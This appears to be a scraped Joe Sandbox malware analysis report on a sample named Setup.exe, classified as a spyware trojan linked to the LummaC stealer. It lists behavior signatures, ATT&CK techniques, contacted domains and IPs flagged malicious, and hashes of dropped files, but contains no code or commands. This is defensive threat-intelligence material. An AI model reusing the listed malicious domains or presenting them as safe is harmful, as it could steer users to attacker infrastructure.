Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Last function: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406805 |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 13 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 12 Process Injection | 1 Obfuscated Files or Information | 11 Input Capture | 25 System Information Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 11 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 111 Masquerading | NTDS | 3 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 221 Virtualization/Sandbox Evasion | LSA Secrets | 221 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
25% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
steamcommunity.com | 104.102.49.254 | true | false | high | |
sputnik-1985.com | 104.21.80.1 | true | true | unknown | |
cloudewahsj.shop | unknown | unknown | false | high | |
noisycuttej.shop | unknown | unknown | true | unknown | |
yokesandusj.sbs | unknown | unknown | true | unknown | |
nearycrepso.shop | unknown | unknown | true | unknown | |
rabidcowse.shop | unknown | unknown | true | unknown | |
wholersorie.shop | unknown | unknown | true | unknown | |
iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq | unknown | unknown | true | unknown | |
framekgirus.shop | unknown | unknown | true | unknown | |
dfgh.online | unknown | unknown | false | high | |
klipvumisui.shop | unknown | unknown | false | high | |
tirepublicerj.shop | unknown | unknown | true | unknown | |
abruptyopsn.shop | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false | |
104.21.80.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1585342 |
Start date and time: | 2025-01-07 14:34:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 45s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 27 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Setup.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@29/27@15/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 2312 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Setup.exe
Time | Type | Description |
---|---|---|
08:35:01 | API Interceptor | |
08:35:05 | API Interceptor | |
09:48:08 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
104.21.80.1 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | CMSBrute | Browse |
| ||
Get hash | malicious | XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
steamcommunity.com | Get hash | malicious | LummaC, PrivateLoader | Browse |
| |
Get hash | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
sputnik-1985.com | Get hash | malicious | LummaC, PrivateLoader | Browse |
| |
Get hash | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | CAPTCHA Scam ClickFix | Browse |
| |
Get hash | malicious | Metasploit | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
NTLGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
AKAMAI-ASUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com | Get hash | malicious | Remcos | Browse | ||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | Remcos | Browse |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 947288 |
Entropy (8bit): | 6.630612696399572 |
Encrypted: | false |
SSDEEP: | 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK |
MD5: | 62D09F076E6E0240548C2F837536A46A |
SHA1: | 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2 |
SHA-256: | 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49 |
SHA-512: | 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 523463 |
Entropy (8bit): | 7.9996022821155925 |
Encrypted: | true |
SSDEEP: | 12288:XO85Bw8NKm6/tt3yxwtIxJGNFexzpeD2PQbMMRi2/YrgMrpUj1j6:e8uT/tt3yxwtIQF2Pq8NdrOjg |
MD5: | C968ADCBB493DC9D2A82F36EAA9E95F8 |
SHA1: | 282C85E77B6237ADDCF74A0B939FD16EFE84F502 |
SHA-256: | 892A47EDA407113D570628BE1967A42B3DAD57E69D6BFD0DF44A36EF630D74F3 |
SHA-512: | 028BA278B02C7CDD83314C46E05044F9E6F756B14749DA6380A69A3154F2D6689EA9433D83C5122CF79DE764BE211119ABFD7C385439A9FEEC4F4047628A3C3E |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 51200 |
Entropy (8bit): | 5.960811901754456 |
Encrypted: | false |
SSDEEP: | 1536:Xe6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8a5:Xe6u640ewy4Za9coRC2jfTq8u |
MD5: | C0EF729745F6117C348BEDB0EB004ABE |
SHA1: | 2031216F14E729CE341E8AD0D21C1D33A5C17E2A |
SHA-256: | 7C9CC1AFF714E9FC46A16590BFD851DE16430C97AEE84C3753C6E8CD04CDD515 |
